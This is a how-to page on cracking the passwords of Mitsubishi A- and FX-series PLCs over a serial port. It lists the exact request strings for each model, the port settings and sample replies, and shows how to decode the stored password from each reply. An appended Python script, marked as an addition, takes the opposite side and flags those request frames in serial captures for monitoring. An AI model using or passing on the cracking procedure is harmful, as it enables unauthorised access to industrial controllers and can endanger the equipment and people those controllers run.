01. Use a serial port debugger and set the relevant parameters.
02. Determine the Mitsubishi PLC model, and select the corresponding string in the serial port debugger according to the PLC model.
Appendix: PLC model and corresponding string

PLC model      String
FX2            \STX0700808\ETX6A
FX2N           \STX0300808\ETX66
FX2_EPROM      \STX0800808\ETX6B
FXON/FXOX      \STX0800808\ETX6B
FX1N/FX1X      \STX0800808\ETX6B
03. After sending, a string of characters will be displayed in the receive box. If you are smart, you will definitely discover the mystery of these characters (that is, the returned password).
If you still can't figure it out, copy these strings into a HEX file and send it. (Remember to disconnect the PLC before sending.)
I suggest you set your own password, then use this method to read it back once. After that, you'll know what's going on.
Password characters: 0-9, A-F.
04. Examples illustrating the cracking of passwords for A and FX series PLCs:
Series A:
Send: A20700FF0205AE0008C3
Received: 0B00FF0200AA7755BBEFCDABA400
Password: ABCDEF
Send: A20700FF0205AE0008C3
Received: 0B00FF0200AA7755BBC1B1A1A4
Password: A1B1C1
Analysis: The password is made up of the characters between BB and A4 in the returned string, read from right to left in units of 2 characters.
FX series:
Set the serial port to COM1, baud rate to 9600, data bits to 7, parity to E (even), and stop bits to 1.
Input: HEX, Display: ASC
Send:
0230383030383038033642
Returns a string of hexadecimal ASCII codes, where 30 is the number 0, 31 is the number 1, 41 is A, 42 is B, and so on.
Example: sending 0230383030383038033642 returns
\STX4236353433323130\ETX41
The password is: B6543210 (42=B)
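
Because the request strings in the appendix are fixed, they work as a signature for monitoring serial taps or serial-gateway logs. The following is an added example, not part of the original page, that scans a captured byte stream for those requests. The checksum rule is an assumption inferred from the appendix strings, and the function names and sample capture are constructed for illustration.

```python
# Added example: detect the password-read requests from the appendix table
# in captured serial traffic (tap or serial-gateway log).
STX, ETX = 0x02, 0x03

# Request bodies copied from the page's table, with the models it lists.
KNOWN_REQUESTS = {
    b"0700808": "FX2",
    b"0300808": "FX2N",
    b"0800808": "FX2_EPROM, FXON/FXOX, FX1N/FX1X",
}

def checksum(body: bytes) -> bytes:
    """Assumed rule: low byte of sum(body + ETX) as two ASCII hex digits."""
    return b"%02X" % ((sum(body) + ETX) & 0xFF)

def parse_frames(stream: bytes):
    """Yield (offset, body, checksum_ok) for each complete STX..ETX+2 frame."""
    i = 0
    while (start := stream.find(bytes([STX]), i)) != -1:
        end = stream.find(bytes([ETX]), start + 1)
        if end == -1 or end + 3 > len(stream):
            break  # truncated frame at end of capture
        body = stream[start + 1:end]
        yield start, body, stream[end + 1:end + 3] == checksum(body)
        i = end + 3

def find_password_reads(stream: bytes):
    """Return one alert per frame whose body is a known password-read request."""
    return [
        {"offset": off, "models": KNOWN_REQUESTS[body], "checksum_ok": ok}
        for off, body, ok in parse_frames(stream)
        if body in KNOWN_REQUESTS
    ]

# Constructed capture: line noise, the request from the FX example above,
# an unrelated frame with an arbitrary body, and an FX2 request whose
# checksum is deliberately wrong (still worth alerting on).
SAMPLE = (
    b"\x00\x11"
    + bytes.fromhex("0230383030383038033642")
    + b"\x02" + b"1234567" + b"\x03" + checksum(b"1234567")
    + b"\x02" + b"0700808" + b"\x03" + b"00"
)

if __name__ == "__main__":
    for alert in find_password_reads(SAMPLE):
        print(alert)
```

An alert with a failed checksum is kept on purpose: a malformed request on the programming port is still a sign that someone is probing it.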